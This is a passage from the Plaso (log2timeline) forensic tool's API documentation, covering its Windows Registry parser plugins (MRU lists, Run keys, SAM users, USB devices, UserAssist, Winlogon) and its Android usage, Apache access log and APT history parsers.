data' ExtractEvents(parser_mediator, registry_key, codepage='cp1252', **kwargs) Extracts events from a Windows Registry key. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key. • codepage (Optional[str]) – extended ASCII string codepage.

330 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

FILTERS = frozenset({}) NAME = 'mrulist_string' plaso.parsers.winreg_plugins.mrulistex module

This file contains MRUListEx Windows Registry plugins. Also see: https://github.com/libyal/winreg-kb/blob/main/documentation/MRU%20keys.asciidoc class plaso.parsers.winreg_plugins.mrulistex.BaseMRUListExWindowsRegistryPlugin Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin, plaso.lib. dtfabric_helper.DtFabricHelper Class for common MRUListEx Windows Registry plugin functionality. class plaso.parsers.winreg_plugins.mrulistex.MRUListExEventData Bases: plaso.containers.events.EventData MRUListEx event data attribute container. entries most recently used (MRU) entries. Type str key_path Windows Registry key path. Type str DATA_TYPE = 'windows:registry:mrulistex' class plaso.parsers.winreg_plugins.mrulistex.MRUListExShellItemListWindowsRegistryPlugin Bases: plaso.parsers.winreg_plugins.mrulistex.BaseMRUListExWindowsRegistryPlugin Windows Registry plugin to parse a shell item list MRUListEx. DATA_FORMAT = 'Most Recently Used (MRU) Registry data' ExtractEvents(parser_mediator, registry_key, codepage='cp1252', **kwargs) Extracts events from a Windows Registry key. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key. • codepage (Optional[str]) – extended ASCII string codepage. FILTERS = frozenset({, }) NAME = 'mrulistex_shell_item_list' class plaso.parsers.winreg_plugins.mrulistex. MRUListExStringAndShellItemListWindowsRegistryPlugin Bases: plaso.parsers.winreg_plugins.mrulistex.BaseMRUListExWindowsRegistryPlugin

5.1. Subpackages 331 Plaso (log2timeline), Release 20210606

Windows Registry plugin to parse a string and shell item list MRUListEx. DATA_FORMAT = 'Most Recently Used (MRU) Registry data' ExtractEvents(parser_mediator, registry_key, codepage='cp1252', **kwargs) Extracts events from a Windows Registry key. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key. • codepage (Optional[str]) – extended ASCII string codepage. FILTERS = frozenset({}) NAME = 'mrulistex_string_and_shell_item_list' class plaso.parsers.winreg_plugins.mrulistex.MRUListExStringAndShellItemWindowsRegistryPlugin Bases: plaso.parsers.winreg_plugins.mrulistex.BaseMRUListExWindowsRegistryPlugin Windows Registry plugin to parse a string and shell item MRUListEx. DATA_FORMAT = 'Most Recently Used (MRU) Registry data' ExtractEvents(parser_mediator, registry_key, codepage='cp1252', **kwargs) Extracts events from a Windows Registry key. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key. • codepage (Optional[str]) – extended ASCII string codepage. FILTERS = frozenset({}) NAME = 'mrulistex_string_and_shell_item' class plaso.parsers.winreg_plugins.mrulistex.MRUListExStringRegistryKeyFilter Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyWithValuesFilter Windows Registry key with values filter. Match(registry_key) Determines if a Windows Registry key matches the filter. Parameters registry_key (dfwinreg.WinRegistryKey) – Windows Registry key. Returns True if the Windows Registry key matches the filter. Return type bool class plaso.parsers.winreg_plugins.mrulistex.MRUListExStringWindowsRegistryPlugin Bases: plaso.parsers.winreg_plugins.mrulistex.BaseMRUListExWindowsRegistryPlugin Windows Registry plugin to parse a string MRUListEx.

332 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

DATA_FORMAT = 'Most Recently Used (MRU) Registry data' ExtractEvents(parser_mediator, registry_key, codepage='cp1252', **kwargs) Extracts events from a Windows Registry key. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key. • codepage (Optional[str]) – extended ASCII string codepage. FILTERS = frozenset({}) NAME = 'mrulistex_string' plaso.parsers.winreg_plugins.msie_zones module

This file contains the MSIE zone settings plugin. class plaso.parsers.winreg_plugins.msie_zones.MSIEZoneSettingsEventData Bases: plaso.containers.events.EventData MSIE zone settings event data attribute container. key_path Windows Registry key path. Type str settings MSIE zone settings. Type str DATA_TYPE = 'windows:registry:msie_zone_settings' class plaso.parsers.winreg_plugins.msie_zones.MSIEZoneSettingsPlugin Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin Windows Registry plugin for parsing the MSIE zone settings. The MSIE Feature controls are stored in the Zone specific subkeys in: Internet SettingsZones key Internet SettingsLockdown_Zones key Also see: http://support.microsoft.com/kb/182569 DATA_FORMAT = 'Microsoft Internet Explorer zone settings Registry data' ExtractEvents(parser_mediator, registry_key, **kwargs) Extracts events from a Windows Registry key. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key.

5.1. Subpackages 333 Plaso (log2timeline), Release 20210606

FILTERS = frozenset({, , , }) NAME = 'msie_zone' plaso.parsers.winreg_plugins.network_drives module

This file contains the Network drive Registry plugin. class plaso.parsers.winreg_plugins.network_drives.NetworkDriveEventData Bases: plaso.containers.events.EventData Network drive event data attribute container. drive_letter drive letter assigned to network drive. Type str key_path Windows Registry key path. Type str server_name name of the server of the network drive. Type str share_name name of the share of the network drive. Type str DATA_TYPE = 'windows:registry:network_drive' class plaso.parsers.winreg_plugins.network_drives.NetworkDrivesPlugin Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin Windows Registry plugin for parsing the Network key. DATA_FORMAT = 'Windows network drives Registry data' ExtractEvents(parser_mediator, registry_key, **kwargs) Extracts events from a Windows Registry key. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key. FILTERS = frozenset({}) NAME = 'network_drives'

334 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

plaso.parsers.winreg_plugins.networks module

This file contains the NetworkList Registry plugin. class plaso.parsers.winreg_plugins.networks.NetworksWindowsRegistryPlugin Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin, plaso.lib. dtfabric_helper.DtFabricHelper Windows Registry plugin for parsing the NetworkList key. DATA_FORMAT = 'Windows networks (NetworkList) Registry data' ExtractEvents(parser_mediator, registry_key, **kwargs) Extracts events from a Windows Registry key. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key. FILTERS = frozenset({}) NAME = 'networks' class plaso.parsers.winreg_plugins.networks.WindowsRegistryNetworkListEventData Bases: plaso.containers.events.EventData Windows NetworkList event data. connection_type type of connection. Type str default_gateway_mac MAC address for the default gateway. Type str description description of the wireless connection. Type str dns_suffix DNS suffix. Type str ssid SSID of the connection. Type str DATA_TYPE = 'windows:registry:network'

5.1. Subpackages 335 Plaso (log2timeline), Release 20210606

plaso.parsers.winreg_plugins.officemru module

“Windows Registry plugin for the Microsoft Office MRU. class plaso.parsers.winreg_plugins.officemru.OfficeMRUListWindowsRegistryEventData Bases: plaso.containers.events.EventData Microsoft Office MRU list Windows Registry event data. entries most recently used (MRU) entries. Type str key_path Windows Registry key path. Type str DATA_TYPE = 'windows:registry:office_mru_list' class plaso.parsers.winreg_plugins.officemru.OfficeMRUPlugin Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin Plugin that parses Microsoft Office MRU keys. DATA_FORMAT = 'Microsoft Office MRU Registry data' ExtractEvents(parser_mediator, registry_key, **kwargs) Extracts events from a Windows Registry key. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key. FILTERS = frozenset({, , , , , , , }) NAME = 'microsoft_office_mru' class plaso.parsers.winreg_plugins.officemru.OfficeMRUWindowsRegistryEventData Bases: plaso.containers.events.EventData Microsoft Office MRU Windows Registry event data. key_path Windows Registry key path. Type str value_string MRU value.

336 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Type str DATA_TYPE = 'windows:registry:office_mru' plaso.parsers.winreg_plugins.outlook module

This file contains an Outlook search MRU Registry parser. class plaso.parsers.winreg_plugins.outlook.OutlookSearchMRUEventData Bases: plaso.containers.events.EventData Outlook search MRU event data attribute container. entries most recently used (MRU) entries. Type str key_path Windows Registry key path. Type str DATA_TYPE = 'windows:registry:outlook_search_mru' class plaso.parsers.winreg_plugins.outlook.OutlookSearchMRUPlugin Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin Windows Registry plugin parsing Outlook Search MRU keys. DATA_FORMAT = 'Microsoft Outlook search MRU Registry data' ExtractEvents(parser_mediator, registry_key, **kwargs) Extracts events from a Windows Registry key. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key. FILTERS = frozenset({, }) NAME = 'microsoft_outlook_mru' plaso.parsers.winreg_plugins.programscache module

Windows Registry plugin to parse the Explorer ProgramsCache key. class plaso.parsers.winreg_plugins.programscache.ExplorerProgramsCacheEventData Bases: plaso.containers.events.EventData Explorer ProgramsCache event data attribute container. entries entries in the program cache. Type str

5.1. Subpackages 337 Plaso (log2timeline), Release 20210606

key_path Windows Registry key path. Type str known_folder_identifier known folder identifier. Type str value_name Windows Registry value name. Type str DATA_TYPE = 'windows:registry:explorer:programcache' class plaso.parsers.winreg_plugins.programscache.ExplorerProgramsCacheWindowsRegistryPlugin Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin, plaso.lib. dtfabric_helper.DtFabricHelper Class that parses the Explorer ProgramsCache Registry data. DATA_FORMAT = 'Windows Explorer Programs Cache Registry data' ExtractEvents(parser_mediator, registry_key, **kwargs) Extracts events from a Windows Registry key. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key. FILTERS = frozenset({, }) NAME = 'explorer_programscache' plaso.parsers.winreg_plugins.run module

This file contains the Run/RunOnce key plugins for Plaso. class plaso.parsers.winreg_plugins.run.AutoRunsPlugin Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin Windows Registry plugin for parsing user specific auto runs. Also see: http://msdn.microsoft.com/en-us/library/aa376977(v=vs.85).aspx DATA_FORMAT = 'Run and run once Registry data' ExtractEvents(parser_mediator, registry_key, **kwargs) Extracts events from a Windows Registry key. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.

338 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

• registry_key (dfwinreg.WinRegistryKey) – Windows Registry key. FILTERS = frozenset({, , , , , , }) NAME = 'windows_run' class plaso.parsers.winreg_plugins.run.RunKeyEventData Bases: plaso.containers.events.EventData Run/RunOnce key event data attribute container. entries Run/RunOnce entries. Type list[str] key_path Windows Registry key path. Type str DATA_TYPE = 'windows:registry:run'

plaso.parsers.winreg_plugins.sam_users module

“Windows Registry plugin for SAM Users Account information. class plaso.parsers.winreg_plugins.sam_users.SAMUsersWindowsRegistryEventData Bases: plaso.containers.events.EventData Class that defines SAM users Windows Registry event data. account_rid account relative identifier (RID). Type int comments comments. Type str fullname full name. Type str key_path Windows Registry key path. Type str login_count login count.

5.1. Subpackages 339 Plaso (log2timeline), Release 20210606

Type int username a string containing the username. Type str DATA_TYPE = 'windows:registry:sam_users' class plaso.parsers.winreg_plugins.sam_users.SAMUsersWindowsRegistryPlugin Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin, plaso.lib. dtfabric_helper.DtFabricHelper Windows Registry plugin for SAM Users Account information. DATA_FORMAT = 'Security Accounts Manager (SAM) users Registry data' ExtractEvents(parser_mediator, registry_key, **kwargs) Extracts events from a Windows Registry key. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key. FILTERS = frozenset({}) NAME = 'windows_sam_users' plaso.parsers.winreg_plugins.services module

Windows drivers and services Registry key parser plugin. class plaso.parsers.winreg_plugins.services.ServicesPlugin Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin Plug-in to format the Services and Drivers keys having Type and Start. DATA_FORMAT = 'Windows drivers and services Registry data' ExtractEvents(parser_mediator, registry_key, **kwargs) Extracts events from a Windows Registry key. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key. FILTERS = frozenset({}) NAME = 'windows_services' class plaso.parsers.winreg_plugins.services.WindowsRegistryServiceEventData Bases: plaso.containers.events.EventData Windows Registry driver or service event data attribute container.

340 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

error_control error control value of the Windows driver or service executable. Type int image_path path of the Windows driver or service executable. Type str key_path Windows Registry key path. Type str name name of the Windows driver or service. Type str object_name Windows service object name. Type str service_dll Windows service DLL. Type str service_type Windows driver or service type. Type int start_type Device or service start type. Type int values names and data of additional values in the key. Type str DATA_TYPE = 'windows:registry:service' plaso.parsers.winreg_plugins.shutdown module

Windows Registry plugin for parsing the last shutdown time of a system. class plaso.parsers.winreg_plugins.shutdown.ShutdownWindowsRegistryEventData Bases: plaso.containers.events.EventData Shutdown Windows Registry event data. key_path Windows Registry key path. Type str value_name name of the Windows Registry value. Type str

5.1. Subpackages 341 Plaso (log2timeline), Release 20210606

DATA_TYPE = 'windows:registry:shutdown' class plaso.parsers.winreg_plugins.shutdown.ShutdownWindowsRegistryPlugin Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin, plaso.lib. dtfabric_helper.DtFabricHelper Windows Registry plugin for parsing the last shutdown time of a system. DATA_FORMAT = 'Windows last shutdown Registry data' ExtractEvents(parser_mediator, registry_key, **kwargs) Extracts events from a ShutdownTime Windows Registry value. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key. FILTERS = frozenset({}) NAME = 'windows_shutdown' plaso.parsers.winreg_plugins.task_scheduler module

This file contains the Task Scheduler Registry keys plugins. class plaso.parsers.winreg_plugins.task_scheduler.TaskCacheEventData Bases: plaso.containers.events.EventData Task Cache event data. key_path Windows Registry key path. Type str task_name name of the task. Type str task_identifier identifier of the task. Type str DATA_TYPE = 'task_scheduler:task_cache:entry' class plaso.parsers.winreg_plugins.task_scheduler.TaskCacheWindowsRegistryPlugin Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin, plaso.lib. dtfabric_helper.DtFabricHelper Plugin that parses a Task Cache key. DATA_FORMAT = 'Windows Task Scheduler cache Registry data' ExtractEvents(parser_mediator, registry_key, **kwargs) Extracts events from a Windows Registry key. Parameters

342 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

This file contains the Terminal Server client Windows Registry plugins. class plaso.parsers.winreg_plugins.terminal_server.TerminalServerClientConnectionEventData Bases: plaso.containers.events.EventData Terminal Server client connection event data attribute container. entries most recently used (MRU) entries. Type str key_path Windows Registry key path. Type str username username, provided by the UsernameHint value. Type str DATA_TYPE = 'windows:registry:mstsc:connection' class plaso.parsers.winreg_plugins.terminal_server.TerminalServerClientMRUEventData Bases: plaso.containers.events.EventData Terminal Server client MRU event data attribute container. entries most recently used (MRU) entries. Type str key_path Windows Registry key path. Type str DATA_TYPE = 'windows:registry:mstsc:mru' class plaso.parsers.winreg_plugins.terminal_server.TerminalServerClientMRUPlugin Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin Windows Registry plugin for Terminal Server Client Connection MRUs keys. DATA_FORMAT = 'Terminal Server Client Most Recently Used (MRU) Registry data' ExtractEvents(parser_mediator, registry_key, **kwargs) Extracts events from a Terminal Server Client MRU Windows Registry key.

5.1. Subpackages 343 Plaso (log2timeline), Release 20210606

Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key. FILTERS = frozenset({, }) NAME = 'mstsc_rdp_mru' class plaso.parsers.winreg_plugins.terminal_server.TerminalServerClientPlugin Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin Windows Registry plugin for Terminal Server Client Connection keys. DATA_FORMAT = 'Terminal Server Client Connection Registry data' ExtractEvents(parser_mediator, registry_key, **kwargs) Extracts events from a Terminal Server Client Windows Registry key. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key. FILTERS = frozenset({, }) NAME = 'mstsc_rdp' plaso.parsers.winreg_plugins.timezone module

Plug-in to collect information about the Windows timezone settings. class plaso.parsers.winreg_plugins.timezone.WinRegTimezonePlugin Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin Plug-in to collect information about the Windows timezone settings. DATA_FORMAT = 'Windows time zone Registry data' ExtractEvents(parser_mediator, registry_key, **kwargs) Extracts events from a Windows Registry key. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key. FILTERS = frozenset({}) NAME = 'windows_timezone'

344 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

class plaso.parsers.winreg_plugins.timezone.WindowsTimezoneSettingsEventData Bases: plaso.containers.events.EventData Timezone settings event data attribute container. configuration timezone configuration. Type str key_path Windows Registry key path. Type str DATA_TYPE = 'windows:registry:timezone' plaso.parsers.winreg_plugins.typedurls module

File containing a Windows Registry plugin to parse the typed URLs key. class plaso.parsers.winreg_plugins.typedurls.TypedURLsEventData Bases: plaso.containers.events.EventData Typed URLs event data attribute container. entries typed URLs or paths entries. Type str key_path Windows Registry key path. Type str DATA_TYPE = 'windows:registry:typedurls' class plaso.parsers.winreg_plugins.typedurls.TypedURLsPlugin Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin A Windows Registry plugin for typed URLs history. DATA_FORMAT = 'Windows Explorer typed URLs Registry data' ExtractEvents(parser_mediator, registry_key, **kwargs) Extracts events from a Windows Registry key. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key. FILTERS = frozenset({, }) NAME = 'windows_typed_urls'

5.1. Subpackages 345 Plaso (log2timeline), Release 20210606 plaso.parsers.winreg_plugins.usb module

File containing a Windows Registry plugin to parse the USB Device key. class plaso.parsers.winreg_plugins.usb.USBPlugin Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin USB Windows Registry plugin for last connection time. Also see: https://msdn.microsoft.com/en-us/library/windows/hardware/jj649944%28v=vs.85%29.aspx DATA_FORMAT = 'Windows USB device Registry data' ExtractEvents(parser_mediator, registry_key, **kwargs) Extracts events from a Windows Registry key. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key. FILTERS = frozenset({}) NAME = 'windows_usb_devices' class plaso.parsers.winreg_plugins.usb.WindowsUSBDeviceEventData Bases: plaso.containers.events.EventData Windows USB device event data attribute container. key_path Windows Registry key path. Type str product product of the USB device. Type str serial serial number of the USB device. Type str subkey_name name of the Windows Registry subkey. Type str vendor vendor of the USB device. Type str DATA_TYPE = 'windows:registry:usb'

346 Chapter 5. plaso package Plaso (log2timeline), Release 20210606 plaso.parsers.winreg_plugins.usbstor module

File containing a Windows Registry plugin to parse the USBStor key. class plaso.parsers.winreg_plugins.usbstor.USBStorEventData Bases: plaso.containers.events.EventData USBStor event data attribute container. device_type type of USB device. Type str display_name display name of the USB device. Type str key_path Windows Registry key path. Type str parent_id_prefix parent identifier prefix of the USB device. Type str product product of the USB device. Type str serial serial number of the USB device. Type str revision revision number of the USB device. Type str subkey_name name of the Windows Registry subkey. Type str vendor vendor of the USB device. Type str DATA_TYPE = 'windows:registry:usbstor' class plaso.parsers.winreg_plugins.usbstor.USBStorPlugin Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin USBStor key plugin. Also see: https://forensicswiki.xyz/wiki/index.php?title=USB_History_Viewing DATA_FORMAT = 'Windows USB Plug And Play Manager USBStor Registry data' ExtractEvents(parser_mediator, registry_key, **kwargs) Extracts events from a Windows Registry key.

5.1. Subpackages 347 Plaso (log2timeline), Release 20210606

The UserAssist Windows Registry plugin. class plaso.parsers.winreg_plugins.userassist.UserAssistPlugin Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin, plaso.lib. dtfabric_helper.DtFabricHelper Plugin that parses an UserAssist key. DATA_FORMAT = 'User Assist Registry data' ExtractEvents(parser_mediator, registry_key, **kwargs) Extracts events from a Windows Registry key. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key. FILTERS = frozenset({, , , , , , , , , , , })

348 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

NAME = 'userassist' class plaso.parsers.winreg_plugins.userassist.UserAssistWindowsRegistryEventData Bases: plaso.containers.events.EventData UserAssist Windows Registry event data. application_focus_count application focus count. Type int application_focus_duration application focus duration. Type int entry_index entry index. Type int key_path Windows Registry key path. Type str number_of_executions number of executions. Type int value_name name of the Windows Registry value. Type str DATA_TYPE = 'windows:registry:userassist' class plaso.parsers.winreg_plugins.userassist.UserAssistWindowsRegistryKeyPathFilter(user_assist_guid) Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter UserAssist Windows Registry key path filter.

plaso.parsers.winreg_plugins.windows_version module

Plug-in to collect information about the Windows version. class plaso.parsers.winreg_plugins.windows_version.WindowsRegistryInstallationEventData Bases: plaso.containers.events.EventData Windows installation event data attribute container. build_number Windows build number. Type str key_path Windows Registry key path. Type str owner registered owner.

5.1. Subpackages 349 Plaso (log2timeline), Release 20210606

Type str product_name product name. Type str service_pack service pack. Type str version Windows version. Type str DATA_TYPE = 'windows:registry:installation' class plaso.parsers.winreg_plugins.windows_version.WindowsVersionPlugin Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin Plug-in to collect information about the Windows version. DATA_FORMAT = 'Windows version (product) Registry data' ExtractEvents(parser_mediator, registry_key, **kwargs) Extracts events from a Windows Registry key. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key. FILTERS = frozenset({}) NAME = 'windows_version' plaso.parsers.winreg_plugins.winlogon module

This file contains the Winlogon Registry plugin. class plaso.parsers.winreg_plugins.winlogon.WinlogonEventData Bases: plaso.containers.events.EventData Winlogon event data attribute container. application Winlogon application. Type str command Winlogon command. Type str handler Winlogon handler. Type str

350 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

key_path Windows Registry key path. Type str trigger Winlogon trigger. Type str DATA_TYPE = 'windows:registry:winlogon' class plaso.parsers.winreg_plugins.winlogon.WinlogonPlugin Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin Windows Registry plugin for parsing the Winlogon key. DATA_FORMAT = 'Windows log-on Registry data' ExtractEvents(parser_mediator, registry_key, **kwargs) Extracts events from a Windows Registry key. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • registry_key (dfwinreg.WinRegistryKey) – Windows Registry key. FILTERS = frozenset({}) NAME = 'winlogon' plaso.parsers.winreg_plugins.winrar module

This file contains a WinRAR history Windows Registry plugin. class plaso.parsers.winreg_plugins.winrar.WinRARHistoryEventData Bases: plaso.containers.events.EventData WinRAR history event data attribute container. entries archive history entries. Type str key_path Windows Registry key path. Type str DATA_TYPE = 'winrar:history' class plaso.parsers.winreg_plugins.winrar.WinRARHistoryPlugin Bases: plaso.parsers.winreg_plugins.interface.WindowsRegistryPlugin Windows Registry plugin for parsing WinRAR History keys. DATA_FORMAT = 'WinRAR History Registry data' ExtractEvents(parser_mediator, registry_key, **kwargs) Extracts events from a Windows Registry key.

5.1. Subpackages 351 Plaso (log2timeline), Release 20210606

Module contents

Imports for the Windows Registry parser.

Submodules plaso.parsers.android_app_usage module

Parser for the Android usage history (usage-history.xml) files. class plaso.parsers.android_app_usage.AndroidAppUsageEventData Bases: plaso.containers.events.EventData Android application usage event data. package name of the Android application. Type str component name of the individual component of the application. Type str DATA_TYPE = 'android:event:last_resume_time' class plaso.parsers.android_app_usage.AndroidAppUsageParser Bases: plaso.parsers.interface.FileObjectParser Parses the Android usage history (usage-history.xml) file. DATA_FORMAT = 'Android usage history (usage-history.xml) file' NAME = 'android_app_usage' ParseFileObject(parser_mediator, file_object) Parses an Android usage-history file-like object. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • file_object (dfvfs.FileIO) – file-like object. Raises UnableToParseFile – when the file cannot be parsed.

352 Chapter 5. plaso package Plaso (log2timeline), Release 20210606 plaso.parsers.apache_access module

Apache access log (access.log) file parser. Parser based on the two default apache formats, common and combined log format defined in https://httpd.apache.org/ docs/2.4/logs.html class plaso.parsers.apache_access.ApacheAccessEventData Bases: plaso.containers.events.EventData Apache access event data. http_request_referer http request referer header information. Type str http_request first line of http request. Type str http_request_user_agent http request user agent header information. Type str http_response_bytes http response bytes size without headers. Type int http_response_code http response code from server. Type int ip_address IPv4 or IPv6 addresses. Type str port_number canonical port of the server serving the request. Type int remote_name remote logname (from identd, if supplied). Type str server_name canonical hostname of the server serving the request. Type str user_name logged user name. Type str DATA_TYPE = 'apache:access'

5.1. Subpackages 353 Plaso (log2timeline), Release 20210606 class plaso.parsers.apache_access.ApacheAccessParser Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser Apache access log (access.log) file parser. DATA_FORMAT = 'Apache access log (access.log) file' LINE_STRUCTURES = [('combined_log_format', {{{{{{{{{{IPv4 address | IPv6 address} {W:(ABCD...) | "-"}} {W:(ABCD...) | "-"}} Group:({{{{{{{{{{{{{Suppress:("[") W:(0123...)} Suppress:("/")} W:(ABCD...)} Suppress:("/")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Combine:({- | + W:(0123...)})} Suppress:("]")})} {{Suppress:(""") SkipTo:("" ")} Suppress:(""")}} W:(0123...)} {"-" | W:(0123...)}} {{Suppress:(""") SkipTo:("" ")} Suppress:(""")}} {{Suppress:(""") SkipTo:(""")} Suppress:(""")}} lineEnd}), ('common_log_format', {{{{{{{{IPv4 address | IPv6 address} {W:(ABCD...) | "-"}} {W:(ABCD...) | "-"}} Group:({{{{{{{{{{{{{Suppress:("[") W:(0123...)} Suppress:("/")} W:(ABCD...)} Suppress:("/")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Combine:({- | + W:(0123...)})} Suppress:("]")})} {{Suppress:(""") SkipTo:("" ")} Suppress:(""")}} W:(0123...)} {"-" | W:(0123...)}} lineEnd}), ('vhost_combined_log_format', {{{{{{{{{{{{W:(ABCD...) Suppress:(":")} W:(0123...)} {IPv4 address | IPv6 address}} {W:(ABCD...) | "-"}} {W:(ABCD...) | "-"}} Group:({{{{{{{{{{{{{Suppress:("[") W:(0123...)} Suppress:("/")} W:(ABCD...)} Suppress:("/")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Combine:({- | + W:(0123...)})} Suppress:("]")})} {{Suppress:(""") SkipTo:("" ")} Suppress:(""")}} W:(0123...)} {"-" | W:(0123...)}} {{Suppress:(""") SkipTo:("" ")} Suppress:(""")}} {{Suppress:(""") SkipTo:(""")} Suppress:(""")}} lineEnd})] MAX_LINE_LENGTH = 2048 NAME = 'apache_access' ParseRecord(parser_mediator, key, structure) Parses a matching entry. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • key (str) – name of the parsed structure. • structure (pyparsing.ParseResults) – elements parsed from the file. Raises ParseError – when the structure type is unknown. VerifyStructure(parser_mediator, line) Verifies that this is an apache access log file. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • line (str) – line from the text file. Returns True if this is the correct parser, False otherwise. Return type bool

354 Chapter 5. plaso package Plaso (log2timeline), Release 20210606 plaso.parsers.apt_history module

Parser for Advanced Packaging Tool (APT) History log files. class plaso.parsers.apt_history.APTHistoryLogEventData Bases: plaso.containers.events.EventData APT History log event data. command command executed Type str error reported error. Type str packages list of packages being affected. Type str requester user requesting the activity. Type str DATA_TYPE = 'apt:history:line' class plaso.parsers.apt_history.APTHistoryLogParser Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser Parses for Advanced Packaging Tool (APT) History log files. DATA_FORMAT = 'Advanced Packaging Tool (APT) History log file' LINE_STRUCTURES = [('record_start', {{{[lineEnd]... "Start-Date:"} Group:({{{{{{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)})} lineEnd}), ('record_body', {{"Commandline:" | "Downgrade:" | "Error:" | "Install:" | "Purge:" | "Remove:" | "Requested-By:" | "Upgrade:"} rest of line}), ('record_end', {{"End-Date:" Group:({{{{{{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} W:(0123...)} Suppress:(":")} 